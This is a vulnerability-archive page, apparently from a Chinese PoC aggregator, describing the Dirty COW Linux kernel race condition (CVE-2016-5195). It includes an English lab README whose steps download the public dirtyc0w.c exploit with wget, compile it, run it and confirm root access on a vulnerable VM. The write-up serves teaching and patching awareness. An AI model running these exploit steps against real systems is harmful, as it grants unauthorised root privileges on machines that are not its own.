关联漏洞
标题:Linux kernel 竞争条件问题漏洞 (CVE-2016-5195)Description:Linux kernel是美国Linux基金会的开源操作系统Linux所使用的内核。 Linux kernel 2.x至4.8.3之前的4.x版本中的mm/gup.c文件存在竞争条件问题漏洞,该漏洞源于程序没有正确处理copy-on-write(COW)功能写入只读内存映射。本地攻击者可利用该漏洞获取权限。
Description
Linux privilege escalation using Dirty COW exploit (CVE-2016-5195).
介绍
# Linux Privilege Escalation (Dirty COW – CVE-2016-5195)
## Project Overview
This project demonstrates privilege escalation on a vulnerable Linux kernel using the **Dirty COW exploit (CVE-2016-5195)**.
By exploiting a race condition in the kernel’s memory handling, a normal user was able to escalate privileges to **root access**.
---
## Tools & Environment
- Vulnerable Linux VM (e.g., Metasploitable2 or custom kernel)
- Dirty COW exploit (C source code)
- GCC (GNU Compiler Collection)
---
## Steps & Methodology
**1.Check kernel version (confirm vulnerability):**
uname -r
**2.Download Dirty COW exploit code:**
wget https://raw.githubusercontent.com/dirtycow/dirtycow.github.io/master/dirtyc0w.c -O dirty.c
**3.Compile the exploit:**
gcc -pthread dirty.c -o dirty -lcrypt
**4.Execute the exploit to escalate privileges:**
./dirty
**5.Verify root access:**
whoami
id
**Learning Outcomes**
Practical experience in Linux privilege escalation.
Understanding kernel-level vulnerabilities and exploitation.
Importance of regular patching & kernel hardening to defend against such attacks.
文件快照
[4.0K] /data/pocs/5a4606612375e30684bc235fc543829fc7d5d637
└── [1.2K] README.md
0 directories, 1 file
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮件到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对 POC 代码进行快照,为了长期维护,请考虑为本地 POC 付费/捐赠,感谢您的支持。